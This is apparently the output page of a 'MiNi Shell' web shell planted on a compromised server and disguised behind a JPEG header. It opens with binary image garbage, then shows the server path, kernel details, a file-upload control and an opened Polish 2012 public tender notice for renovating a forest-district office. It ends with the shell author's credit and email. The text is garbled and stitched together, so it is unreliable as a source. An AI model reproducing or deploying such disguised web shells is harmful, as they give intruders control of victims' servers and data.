JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120426/133534-N-2012.html

<p class="kh_header"><b>Gromnik: Przebudowa budynku administracyjnego Nadleśnictwa Gromnik</b><br>
<b>Numer ogłoszenia: 133534 - 2012; data zamieszczenia: 26.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Gromnik , ul. Generała Andersa 1, 33-180 Gromnik, woj. małopolskie, tel. 014 6514205, faks 014 6515081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromnik.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku administracyjnego Nadleśnictwa Gromnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
    Przebudowa budynku administracyjnego Nadleśnictwa Gromnik.
    w zakresie:   
1) przebudowa schodów wejściowych do budynku biura 
2) przebudowa pomieszczeń biurowych istniejących : rozbiórka ścianek działowych i wykonanie nowych,  wymiana  podłóg wykonanych z parkietu oraz płytek ceramicznych, roboty instalacyjne  elektryczne, wod- kan ,  CO , wykonanie i naprawa tynków wykonanie gładzi szpachlowej  roboty malarskie i   inne towarzyszące .
3) modernizacja -adaptacja  pomieszczeń części parterowej budynku  na pomieszczenia archiwum, pokoi biurowych, gościnnych, sanitariatów.
4) wykonanie podjazdu dla osób niepełnosprawnych
5) przebudowa dachu na części parterowej budynku biurowo warsztatowego 
6)  wymiana stolarki okiennej i drzwiowej wew. i zew.
7) wykonanie klimatyzacji w pokojach  biurowych.
8) wymiana  okładziny ściennej z boazerii drewnianej na poddaszu  na płyty KG,  oraz na ścianach    klatki schodowej i ciągach komunikacyjnych - korytarzach  na okładzinę z korka.
9) termomodernizacja całego budynku 
10) wykonanie odwodnienia i osuszenia budynku - izolacje poziome i pionowe ścian
11) wykonanie  nowych i częściowa wymiana istniejących opasek z kostki brukowej  przy budynku biura.    
 
2.Wszystkie powyższe roboty budowlane  zostały w sposób szczegółowy ujęte w załączonym do niniejszej specyfikacji istotnych warunków zamówienia   projekcie i przedmiarze robót.
3.Wszystkie roboty budowlane  winny być zrealizowane zgodnie z dokumentacją projektową  techniczną , z obowiązującymi normami i przepisami obowiązującymi w tym zakresie, sztuką budowlaną , przepisami BHP,  przepisami p.poż oraz przepisami o ochronie środowiska. 
4.Wykonawca na własny koszt wykona oznakowania i zabezpieczenia miejsc prowadzenia prac na czas realizacji robót
5. W związku z tym, że roboty budowlane będą prowadzone  również w istniejącej  części biurowej  aby ograniczyć do minimum  uciążliwości związane z funkcjonowaniem /pracy biura  Zamawiający ustala następującą kolejność wykonania robót budowlanych budynku administracyjnego a Wykonawca  jest zobowiązany  do zachowania wskazanej niżej kolejności  wykonania robót  na  poszczególnych  kondygnacjach, pomieszczeniach .  
 Po wykonaniu  robót  budowlanych  w całości na   poszczególnej kondygnacji, pomieszczeń   i dokonanym odbiorze przez zamawiającego  wykonawca może  przystąpić do  wykonania   dalszych robót w następującej kolejności :   

1) Jednocześnie -  wszystkie pomieszczenia poddasza  w całości wraz z klatką schodową od poziomu I piętra na poddasze oraz pomieszczenia piwnic w całym zakresie, wszystkie roboty na zewnątrz  budynku oraz pomieszczenie archiwum.  Uwaga - pomieszczenia archiwum  należy wykonać  w terminie jak najkrótszym ponieważ warunkuje to przeniesienie materiałów archiwalnych z istniejącego  archiwum co umożliwi wykonanie pozostałych robót  budowlanych w innych pomieszczeniach na tym poziomie budynku.  

2) Wszystkie pomieszczenia na I piętrze wraz z klatką schodową do poziomu parteru .
     Uwaga - wykonanie w całości robót na poddaszu warunkuje rozpoczęcie robót na                  
                    pierwszym piętrze.

3) Jednocześnie wszystkie pomieszczenia na poziomie parteru budynku .
      Uwaga - wykonanie w całości robót na pierwszym piętrze  warunkuje rozpoczęcie robót na      
                      parterze..
4) Wszystkie roboty Wykonawca zorganizuje tak aby w jak najmniejszym stopniu były uciążliwe dla pracowników Zamawiającego i petentów biura nadleśnictwa.

5) W trakcie prowadzenia robót budowlanych  związanych z  przebudową schodów wejściowych  do budynku biura  Nadleśnictwa,  Wykonawca  pozostałe roboty na zewnątrz budynku  zorganizuje i  poprowadzi tak, aby  było możliwe wejście do budynku biura  zewnętrznymi drzwiami wejściowymi do świetlicy   wraz z zabezpieczeniem zgodnie z przepisami BHP.
 
6) Wszystkie pomieszczenia  po wykonanych robotach  zostaną przez Wykonawcę robót budowlanych uporządkowane  (wysprzątane) tak aby mogły być przeznaczone do  użytkowania  bez  dokonywania poprawek przez Zamawiającego.

7) Wszystkie materiały z rozbiórki,  demontażu  w czasie prowadzenia robót budowlanych, Wykonawca  złoży  w miejscu wyznaczonym przez Zamawiającego.
 Wszystkie  ewentualne zmiany, odstępstwa  od ustalonej kolejności wykonania robót  których nie można było przewidzieć  przed robotami  Wykonawca  musi ustalić  z Zamawiającym .

8) W czasie prowadzenia robót  w poszczególnych pomieszczeniach -kondygnacjach  budynku, Wykonawca  na własny koszt  zabezpieczy pozostałe  pomieszczenia  oraz meble, sprzęt  urządzenia   niemożliwe do przeniesienia na czas wykonywania robót budowlanych  w taki sposób  aby nie uległy  zniszczeniu, zakurzeniu.

 9) Wykonawca  na zakończenie robót  w każdym dniu  wykona prace porządkowe na korytarzach, klatce schodowej  i innych pomieszczenia które uległy zanieczyszczeniu czasie prowadzenia robót budowlanych.

10) W czasie wykonywania robót budowlanych związanych z przebudową dachu ,Wykonawca robót  na własny koszt zabezpieczy budynek przed zniszczeniami spowodowanymi niekorzystnymi warunkami atmosferycznymi.  
 Wykonawca  w przypadku wystąpienia zniszczeń  ponosi pełną odpowiedzialność materialną za powstałe szkody.

 11) W przypadku zniszczenia, uszkodzenia jakichkolwiek  przedmiotów, urządzeń   przez Wykonawcę  w czasie prowadzenia robót budowlanych  będących  własnością  PGL LP Nadleśnictwa Gromnik, Wykonawca ponosi pełną odpowiedzialność materialną za wyrządzone szkody.

12) Wykonawca robót  musi dysponować potencjałem technicznym i kadrowym  aby  wszystkie roboty zostały wykonane należycie i  w umownym terminie.

 13) Zamawiający ustala, że roboty budowlane  w istniejącej części biurowej budynku  będą mogły być wykonywane  w dni robocze tygodnia  od godz.7:00 - 20:00  a pozostałe roboty   w/g ustaleń Wykonawcy.

6. Zamawiający dopuszcza  powierzenie wykonania części zakresu prac podwykonawcom. W związku z powyższym Zamawiający żąda wskazania w składanej ofercie zakresu prac, które Wykonawca zamierza powierzyć podwykonawcom, z podaniem  zakresu i rodzaju robót. Wykonawca zobowiązany jest dostarczyć na żądanie Zamawiającego wszelkich dodatkowych informacji dotyczących podwykonawców w zakresie związanym z prawidłowym wykonaniem zamówienia. 
7. Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy w stosunku co do treści oferty na podstawie której dokonano wyboru Wykonawcy (w zakresie: zmiany terminu wykonania umowy, zmiany formy zabezpieczenia umowy, zmian kierownika budowy, inspektora nadzoru, zmiany podwykonawców) jedynie w przypadku:
1)	zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i są niezależne od woli Stron, oraz uniemożliwiają należyte wykonanie umowy (zmiana warunków gospodarczych, zmiana wysokości dostępnych środków finansowych, zmiana stanu prawnego), 
2)	zaistnienia siły wyższej uniemożliwiającej należyte wykonanie umowy (m.in. strajków, stanów wojennych i wyjątkowych, niekorzystnych warunków pogodowych i przyrodniczych, oraz klęsk żywiołowych),
3)	wprowadzenia zmian do umowy korzystnych dla Zamawiającego.
Zmiany zostaną wprowadzone po wcześniejszych ustaleniach dokonanych pomiędzy stronami postępowania, w formie pisemnej pod rygorem nieważności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 10% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, które zostało ujęte w zamówieniu podstawowym. Zamówienia uzupełniające będą dotyczyć przedmiotu zamówienia określonego w specyfikacji istotnych warunków zamówienia sporządzonej dla zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.40.00.00-1, 45.45.00.00-6, 45.30.00.00-0, 45.26.00.00-7, 45.33.20.00-3, 45.42.00.00-7, 45.44.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 . Oferta musi być zabezpieczona wadium  w  następującej  wysokości:
- 	 wadium o wartości: 40 000,00 zł. (słownie : czterdzieści tysięcy złotych)
2.Wadium może być wniesione w jednej lub kilku następujących formach:
a ) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3. Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego: Konto BGŻ S.A. o/T -ów 12203000451110000000840200 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. 
4.Wadium wnoszone w formie niepieniężnej należy złożyć w formie oryginału w kasie Zamawiającego (czynnej w dni robocze w godzinach   od 800 do 1400 ) lub załączyć do składanej przez Wykonawcę oferty.
5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
6. Wadium musi być wniesione najpóźniej do terminu składania ofert. tj. do dnia 11.05.2012 r. do godz. 900
7. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań co do warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony gdy wykonawca wykaże w ciągu ostatnich 5 lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował 2 roboty budowlane dotyczące budowy, przebudowy lub remontów budynków  o wartości 500 tyś. zł. każda z  nich, z podaniem daty i miejsca wykonania, rodzaju oraz wartości oraz przedstawi dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań co do warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony gdy wykonawca wykaże, że posiada osobę/osoby do kierowania robotami budowlanymi z minimum 2 - letnim doświadczeniem zawodowym tj.; kierownika budowy/robót z uprawnieniami w specjalności konstrukcyjno - budowlanej, instalacyjnej  w zakresie sieci instalacji i urządzeń cieplnych,   wentylacyjnych, wodociągowych  i kanalizacyjnych , instalacyjnej w zakresie  sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,  oraz  przedstawi informację o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań co do warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy w stosunku co do treści oferty na podstawie której dokonano wyboru Wykonawcy (w zakresie: zmiany terminu wykonania umowy, zmiany formy zabezpieczenia umowy, zmian kierownika budowy, inspektora nadzoru, zmiany podwykonawców) jedynie w przypadku:
1)	zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i są niezależne od woli Stron, oraz uniemożliwiają należyte wykonanie umowy (zmiana warunków gospodarczych, zmiana wysokości dostępnych środków finansowych, zmiana stanu prawnego), 
2)	zaistnienia siły wyższej uniemożliwiającej należyte wykonanie umowy (m.in. strajków, stanów wojennych i wyjątkowych, niekorzystnych warunków pogodowych i przyrodniczych, oraz klęsk żywiołowych),
3)	wprowadzenia zmian do umowy korzystnych dla Zamawiającego.
Zmiany zostaną wprowadzone po wcześniejszych ustaleniach dokonanych pomiędzy stronami postępowania, w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gromnik.krakow.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Gromnik
Gen. Andersa 1
33-180 Gromnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2012 godzina 09:00, miejsce: PGL LP Nadleśnictwo Gromnik
Gen. Andersa 1
33-180 Gromnik
sekretariat nadleśnictwa (pok. nr 6).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com